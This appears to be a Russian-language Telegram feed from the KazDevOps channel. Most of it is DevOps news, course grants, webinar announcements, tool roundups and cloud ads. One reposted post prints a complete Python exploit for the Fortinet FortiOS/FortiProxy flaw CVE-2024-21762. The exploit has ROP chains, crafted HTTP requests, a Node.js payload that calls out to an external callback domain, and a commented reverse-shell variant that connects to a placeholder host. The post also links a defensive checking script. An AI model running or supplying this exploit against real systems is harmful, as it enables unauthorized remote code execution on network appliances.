KazDevOps

☄️ Proxmox против FreeBSD: что работает лучше? Сравнивали Proxmox 8.2.2 и FreeBSD 14.1. Для теста использовался физический сервер:

Intel Core i7-6700 2x SSD M.2 NVMe 512 ГБ 4x ОЗУ 16384 МБ DDR4 Сетевая карта 1 Гбит Intel I219-LM

👉 Посмотреть результаты тестирования Автор статьи постарался быть максимально объективным, поскольку он использует оба решения ежедневно. #proxmox #freebsd #devops @DevOpsKaz

☄️ Получите грант на 600 000 тенге и станьте мастером Data Science Наши партнеры и друзья из Astana Hub курируют проект Tech Orda для подготовки IT специалистов. Они сотрудничают со многими школами и сегодня предлагают получить 1 из 33 ваучеров на бесплатные курсы по программе Data Science и Машинное обучение в Data Science Academy. 🏆 К слову, Data Science Academy вошла в топ-3 из 78 школ по Data Science. У них вы получите: ☑️ Передовые знания по Data Science и машинному обучению ☑️ Обучение у лучших преподавателей ☑️ Гарантированные карьерные возможности 👉 Подавайте заявку через AstanaHub #techorda #dsacademy #astanahub #datascience #машинноеобучение

🔥 Получи грант на 600 000 тенге и стань DevOps-инженером «на стероидах» Наша школа прошла отбор в проект Tech Orda для подготовки IT специалистов и мы предоставляем квоту на 18 человек на курс DevOps Upgrade. Это курс с высокой нагрузкой и большими результатами. Для IT-специалистов, которые хотят прокачать hard skills, повысить свою стоимость на рынке труда и построить карьеру подготовленного DevOps-инженера. 🚩 Длительность обучения: 6 месяцев. Вот так это работает: — Обучение стоит 1 млн тенге — Tech Orda вносит за студента 600 000 тенге — Студент платит 400 000 тенге в качестве гарантированного взноса — сразу или в рассрочку от Kaspi 🚩 Ограничения по возрасту: от 18 до 45 лет. 👉 Подавайте заявку через AstanaHub Мы отберем студентов на обучение, а после экзамена самым способным откроем путь на стажировку в Core 24/7 — лидере DevOps-услуг в Казахстане. @DevOpsKaz

Павлодар на связи! Именно там есть возможность встретиться с экспертом облачных технологий — Enes Turan! 👨‍💻 Enes Turan — эксперт Google Developer, Cloud Platform Engineer (Acedemand), инструктор Udemy, соорганизатор Cloud Native Türkiye. Его опыт: мульти-облачные решения, автоматизация инфраструктуры, безопасность. 🗓 13 июля, 11:00 📍 г. Павлодар, ул. Чокина 139 (IT-School) 👉 Записывайтесь, кто рядом или собирался на Google I/O Pavlodar!

Открыт приём заявок с докладами на CodeTalks в Алматы. Фулстек-конференция для ИТ-специалистов. Всем привет! В этом году уже второй раз пройдёт конференция для разработчиков CodeFest в Алматы. А точнее на CodeTalks — именно такое название будет у конференции c этого года в Алматы. Вкратце, что будет: – Дата проведения: 16 ноября 2024. Офлайн. Алматы. – Участников 800 человек. Участие платное — 25 000 тенге. – Регистрация откроется в сентябре. – Партнёрский движ от крупных ИТ-компаний. Афтепати для всех, сразу после конференции. – Ключевые направления программы будут: Backend, Frontend, Management, QA, Data Science, Mobile, Analysis, а также DevOps. И, конечно, Квартирники — традиционный формат народных дискуссий. Приглашаем выступить с докладами и ждём ваши заявки в программу до 10 сентября. 🍿Податься с докладом просто, вдумчиво заполнить форму 👉 Call for Papers.

☄️ Автоматизация выгрузки тикетов из Jira и визуализации отчетов в PowerBI Если вам приходилось строить отчеты по работе отделов компании, то вы знаете, что делать это вручную каждую неделю или месяц достаточно долго и требует много внимания к деталям. Тут на помощь приходит автоматизация с помощью обычного скриптинга и интеграция с Jira API и PowerBI. Рассказываем про удобный менеджмент тикетов Jira и визуализацию данных по ним — и как это можно автоматизировать. 👉 Читайте в новой статье Статья пригодится не только DevOps специалистам, но и продакт менеджерам, HR и дата-аналитикам. В общем, упрощаем подход аплодинга и постройки визуализации, чтобы сэкономить ваши время и силы. #devops #jira #powerbi #python @DevOpsKaz

☄️ 5 причин прийти на бесплатный вебинар «Serverless: трюки и советы на практике» — Узнаете, как сэкономить на инфраструктуре и улучшить управление данными — Поймете, когда надо и не надо мигрировать в облако, а также какие есть альтернативы — Обсудите лучшие подходы к Serverless — Рассмотрите реальные кейсы, а не сухую теорию, сможете перенять успешный опыт — Сможете выиграть призы 📌 16 июля в 19:00 по Алматы Будет интересно всем, кто интересуется cloud migration и serverless 💪 👉 Посмотрите полную программу и регистрируйтесь здесь ...и зовите коллег! @DevOpsKaz

🔥 Инструменты недели для DevOps-специалистов Представляем подборку нетривиальных сервисов, которые помогают решать рутинные задачи. Сразу к делу 👇🏼 ➖ chart-testing — инструмент для тестирования Helm-чартов. Он автоматически обнаруживает измененные чарты по отношению к целевой ветке. Помогает как в линтинге («парикмахер» кода), так и в тестировании pull-запросов. ➖ greenmask — сервис для резервного копирования, анонимизации и маскирования данных в PostgreSQL. Совместим с существующими утилитами PostgreSQL, легко и гибко настраивается. ➖ Trivy — утилита, которая помогает находить уязвимости, неправильные конфигурации, секреты, SBOM в контейнерах, Kubernetes, репозиториях кода, облаках и другом. Направляет свои сканеры на проблемы безопасности, чтобы вы могли спать спокойно. Пользуйтесь и делитесь с коллегами 🤝 #trivy #greenmask #postgresql #helm #devops @DevOpsKaz

☄️ Предлагаем попробовать услуги ИТ-инфраструктуры от Servercore.com в Казахстане. У коллег есть выделенные серверы и облачные. Например, облачный сервер Standard Line на день обойдется в $0.34, а выделенный EL42-NVMe в $17,5. Обещают техподдержку 24/7 и отказоустойчивость в 99,98%. 👉 Пишите в личку Алексею Пешкову и регистрируйтесь в консоли управления — вам начислят $110, чтобы вы могли попробовать серверные или облачные вычисления. Всем хорошего дня! 🌞

🔥 Нужные сертификации в зависимости от роли В карточках ниже 👇🏼 показали, какие нужны сертификаты в зависимости от роли в DevOps и Cloud: — Cloud DevOps Engineer — Cloud Solutions Architect — Cloud Security Specialist — SRE Specialist — Platform Engineer — Ops Engineer Они значительно усиливают вас как востребованного профи, но не являются прямым билетом на должность. Почитайте советы по резюме, чтобы сделать его еще более презентабельным. Пользуйтесь и делитесь с коллегами 🤝 @DevOpsKaz

🖥 «Эффект домино: как IT-инфраструктура одной компании влияет на множество бизнесов» Когда мы особенно ярко чувствуем тесную связь разных компаний? Правильно: когда у одной из них случается сбой. Именно поэтому важно иметь надёжную IT-инфраструктуру, чтобы минимизировать проблемы не только у собственного, но и связанного с вашим бизнеса. Виктор Водолазкин, Head of BDM компании Nixys, проведёт открытый вебинар, где расскажет про кастомизацию IT-инфраструктуры и покажет, как компании в сфере FoodTech справляются с нагрузками «в сезоны продаж». 📌 Когда: 18 июля (четверг), в 15:00 мск 📌 Кому будет полезно: CEO CIO, CVO. Техническим менеджерам, IT-руководителям. Представителям B2B и бизнеса с сезонными продажами. На онлайн-трансляции Виктор разберёт клиентский кейс и ответит на все вопросы. Чтобы зарегистрироваться — нажмите сюда.

Alibaba Cloud все больше заходит на рынок облачных технологий, в том числе и в Казахстане. Получить сертификацию и стать специалистом в этой области можно уже сегодня. 👉 Бесплатный доступ ко всем сертификатам Apsara Clouder и ко всем специальным сертификатам можно получить здесь. Нажмите на Learn for Free (Membership) или Members Claim на странице курса подготовки к сертификации, которую вы хотите изучить — и вы сможете пройти онлайн-курсы и сдать онлайн-экзамены бесплатно. У вас будет максимум 4 возможности сдать каждую сертификацию Apsara Clouder и Specialty. #alibabacloud @DevOpsKaz

🔥 Кейс ioka: как помогли пройти сертификацию PCI DSS 4.0 Недавно мы анонсировали аудит PCI DSS как отдельную услугу — и сегодня рассказываем о том, как и чем помогали компании ioka, какие были сложности и решения. 👉 Читайте в новом кейсе Небольшой спойлер:

Компания ioka обратилась к нам впервые 3 года назад — тогда мы мигрировали их приложения в Казахстан, чтобы избежать задержек и блокировок. В облаке осталась standby-копия системы как запасной план на случай, если ЦОД будет недоступен. В экосистеме онлайн-платежей ioka разработка не прекращается, а стек технологий постоянно растет. Приближалась ежегодная сертификация PCI DSS. С этой задачей компания и обратилась к нам — получить сертификат PCI DSS 4.0.

#кейс #devops @DevOpsKaz

Fortinet FortiOS & FortiProxy Unauthorized RCE CVE-2024-21762 #RCE #CVE #Fortinet #FortiOS #FortiProxy CVE-2024-21762 представляет собой уязвимость записи за границы буфера (buffer overflow) в Fortinet FortiOS и FortiProxy. Эта уязвимость позволяет неавторизованному атакующему выполнять произвольный код с помощью специально сформированных HTTP-запросов. ➡️Атакуемые продукты: - FortiOS - FortiProxy Эксплойт:

import socket
import time
import argparse


TARGET = 'xxxxxxxxxxxx'  # Target IP
PORT = 443  # Target port, usually 443 for SSL VPN

def make_sock(target, port):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target, port))
    return sock

def send_payload(payload, target, port):
    with make_sock(target, port) as ssock:
        ssock.sendall(payload)

def main():
    ssl_do_handshake_ptr = b"%60%ce%42%00%00%00%00%00"
    getcwd_ptr = b"%70%62%2c%04%00%00%00%00"

    pivot_1 = b"%52%f7%fd%00%00%00%00%00" # push rdi; pop rsp; ret;
    pivot_2 = b"%ac%c9%ab%02%00%00%00%00" # add rsp, 0x2a0; pop rbx; pop r12; pop rbp; ret;

    rop  = b""
    rop += b"%c6%e2%46%00%00%00%00%00" # push rdi; pop rax; ret;
    rop += b"%19%6f%4d%01%00%00%00%00" # sub rax, 0x2c8; ret;
    rop += b"%8e%b2%fe%01%00%00%00%00" # add rax, 0x10; ret;
    rop += b"%63%db%ae%02%00%00%00%00" # pop rcx; ret;
    rop += b"%00%00%00%00%00%00%00%00" # zero rcx
    rop += b"%38%ad%98%02%00%00%00%00" # or rcx, rax; setne al; movzx eax, al; ret;

    rop += b"%c6%52%86%02%00%00%00%00" # shl rax, 4; add rax, rdx; ret;
    rop += b"%6e%d0%3f%01%00%00%00%00" # or rdx, rcx; ret; - rdx is zero so this is a copy
    rop += b"%a4%df%98%02%00%00%00%00" # sub rdx, rax; mov rax, rdx; ret;

    rop += b"%f5%2c%e6%00%00%00%00%00" #  sub rax, 0x10; ret;
    rop += b"%e4%e6%d7%01%00%00%00%00" #  add rsi, rax; mov [rdi+8], rsi; ret;

    rop += b"%10%1b%0a%01%00%00%00%00" # push rax; pop rdi; add eax, 0x5d5c415b; ret;
    rop += b"%25%0f%8d%02%00%00%00%00" # pop r8; ret; 0x028d0f25
    rop += b"%00%00%00%00%00%00%00%00" # r8

    pivot_3 = b"%e0%3f%4d%02%00%00%00%00" # add rsp, 0xd90; pop rbx; pop r12; pop rbp; ret;

    call_execl = b"%80%c1%43%00%00%00%00%00"

    bin_node = b"/bin/node%00"
    e_flag = b"-e%00"
  ## use this one for rev shell   b'(function(){var net%3drequire("net"),cp%3drequire("child_process"),sh%3dcp.spawn("/bin/node",["-i"]);var client%3dnew net.Socket();client.connect(1337,"xxxxxxxxxxx",function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/;})();%00'
    js_payload = b'(function(){var cp=require("child_process");cp.execSync("nslookup xxxxxxxxxxx.oastify.com");})();%00'

    form_value  = b""
    form_value += b"B"*11 + bin_node + b"B"*6 + e_flag + b"B"*14 + js_payload
    form_value += b"B"*438 + pivot_2 + getcwd_ptr
    form_value += b"B"*32 + pivot_1
    form_value += b"B"*168 + call_execl
    form_value += b"B"*432 + ssl_do_handshake_ptr
    form_value += b"B"*32 + rop + pivot_3
    body = (b"B"*1808 + b"=" + form_value + b"&")*20

    data  = b"POST /remote/hostcheck_validate HTTP/1.1\r\n"
    data += b"Host: " + TARGET.encode() + b"\r\n"
    data += b"Content-Length: " + str(len(body)).encode() + b"\r\n"
    data += b"\r\n"
    data += body

    send_payload(data, TARGET, PORT)

    # Short delay to ensure the server processes the first request
    time.sleep(2)

    # Preparing and sending the second part of the exploit
    data  = b"POST / HTTP/1.1\r\n"
    data += b"Host: " + TARGET.encode() + b"\r\n"
    data += b"Transfer-Encoding: chunked\r\n"
    data += b"\r\n"
    data += b"0"*4137 + b"\0"
    data += b"A"*1 + b"\r\n\r\n"

    send_payload(data, TARGET, PORT)

if __name__ == "__main__":
    main()

Подробные ресерчи можете найти ТУТ, ТУТ, ТУТ Скрипт для проверки безопасности вашего сервера https://github.com/BishopFox/cve-2024-21762-check

git clone https://github.com/BishopFox/cve-2024-21762-check; cd cve-2024-21762-check; python3 check-cve-2024-21762.py <host> <port>

🌚 @poxek

☄️ Наш вебинар «Serverless: трюки и советы на практике» совместно с Yandex Cloud стал еще интереснее! Напоминаем, что 16 июля в 19:00 по Алматы состоится бесплатный вебинар. Вы погрузитесь в Serverless и на практике узнаете возможности бессерверной архитектуры.

🚩 Мы добавили в программу еще одного спикера — СОО Core 24/7 Александра Калинина. Саша расскажет про миграцию в облако на реальном кейсе. Какие были сложности, как их преодолели и что получил клиент в результате.

Будет интересно всем, кто занимается cloud migration или планирует делать это в будущем 💪 Также в программе: ➖ Yandex Cloud в Казахстане. ➖ Serverless подход к архитектуре. ➖ Способы применения Serverless: для чего подходит, а для чего не годится. 👉 Регистрируйтесь здесь

Этот вебинар для техлидов, СТО, DevOps специалистов и руководителей IT бизнеса, которые хотят оценить необходимость в cloud migration и оптимизировать этот процесс, узнать об альтернативах, улучшить управление данными.

Зовите коллег, начальников и приходите сами. До встречи 🤝 @DevOpsKaz

🔥 Как BMW внедряет хаос-инжиниринг и что это дает BMW Group использует хаос-инжиниринг для повышения устойчивости своих систем. Компания создала внутреннюю команду для симуляции сбоев в производственной среде, выявления уязвимостей и повышения надежности. 👉 Читайте в новой статье и делитесь с коллегами Здесь не только размышления о хаос-инженерии, но и вполне конкретные эксперименты. #devops #chaos #cloud #aws @DevOpsKaz

☄️ Упрощаем работу с сетью в Kubernetes Многие знают про kube-proxy, а вот Cilium почему-то упускают из вида. Исправляем ситуацию — и рассказываем о ключевых фичах и главных отличиях. 1️⃣ Сетевая безопасность. Cilium использует eBPF для создания гибких сетевых политик. 2️⃣ Мониторинг через Hubble. Позволяет наблюдать за сетевым трафиком и выявлять проблемы. 3️⃣ Ingress-контроллер и L4-балансировщики. Улучшают распределение нагрузки. 4️⃣ Service Mesh. Облегчает управление микросервисами.

eBPF для ядра Linux — как JavaScript для браузера

📈 Сравнение с kube-proxy Cilium демонстрирует более высокую производительность и низкую задержку благодаря использованию eBPF для обработки сетевого трафика в ядре Linux. Тесты показывают, что Cilium может обрабатывать больше запросов в секунду и обеспечивает более стабильную работу при высоких нагрузках по сравнению с kube-proxy. 👉 Подробности в деталях #k8s #kubernetes #cilium #kubeproxy @DevOpsKaz

☄️ Автогенерация секретов в Kubernetes Встречайте — secretgen-controller помогает генерировать секреты с конкретным типом данных. Они будут добавляться в Secret автоматически. Чем полезен: — Генерирует Certificate (CAs, leafs), Secret Template Field, Password, RSA Key и SSH Key — Поддерживает экспорт и импорт секретов между пространствами имен — Поддерживает создание секретов из данных, находящихся в других ресурсах Kubernetes Особенно интересен тем, кто работает с секретами методом push, а не pull. 👉 Документация 👉 Примеры использования #secrets #k8s #kubernetes @DevOpsKaz

👀 Как понять, что не хватает DevOps'у или SRE-инженеру для трудоустройства На помощь приходит сообщество — SRE-инженер написал на Reddit, что 7 месяцев уже без работы. Да, даже у сеньоров бывает такое. Другие инженеры пришли на ревью его резюме и дали советов... 1️⃣ Не все свои навыки стоит расписывать одним полотном — большое разнообразие скиллов сбивает с толку. Стоит показывать только релевантные под конкретную вакансию, а вторичные сокращать. 2️⃣ Скиллы без влияния на бизнес — это пустое. Эффект от вашей работы должен быть четко прописан и заметен. Лучше в цифрах. 3️⃣ Подтверждение ваших компетенций должно быть явно прописано. Если вы сеньор или мидл — докажите это и привлеките внимание к своей кандидатуре с первых же строк. 👉 Почитать обсуждение полностью Ну, и не забывайте прокачиваться из года в год. Навыки в нашей сфере часто устаревают и их нужно обновлять. Например, на курсах Слёрм от нашего учебного центра — у нас можно купить их по региональной скидке от 10%. #devops #cv #sre @DevOpsKaz

🚀🔐 Способы защиты цифровой безопасности личных и корпоративных данных Беспокоитесь о том, как сохранить конфиденциальность данных на рабочем месте и защитить свои аккаунты от взлома или похищения? Присоединяйтесь к митапу, где мы подробно рассмотрим способы защиты личных и корпоративных данных. Цифровая безопасность — это не только современный тренд, но и необходимость для каждого из нас! Митап будет полезен как для новичков, так и для опытных пользователей, стремящихся усилить свои знания в области информационной безопасности. 🔑 Основные темы: ⟡ Обзор инструментов безопасности: Ознакомимся с современными инструментами и технологиями защиты данных. ⟡ Практические советы: Получите набор проверенных методов и советов для укрепления вашей цифровой защиты в интернете. ⟡ Интерактивное обсуждение: Разберем, как предотвратить утечку данных с рабочего места и как обезопасить социальные сети. ⟡ Конкретные рекомендации: На примерах научимся предотвращать распространение вирусов-шифровальщиков и утечки данных. Вы узнаете, как простые действия и следования основам информационной гигиены могут существенно снизить риски утечки данных. Подключитесь к нашему митапу и повысьте уровень вашей цифровой защиты! 🗓 28 июня (пятница) 2024 года ⏰ 17:00 📺 Встреча пройдет в онлайн-формате в Zoom Наш информационный партнер: KazDevOps Участие бесплатное, но требуется предварительная регистрация.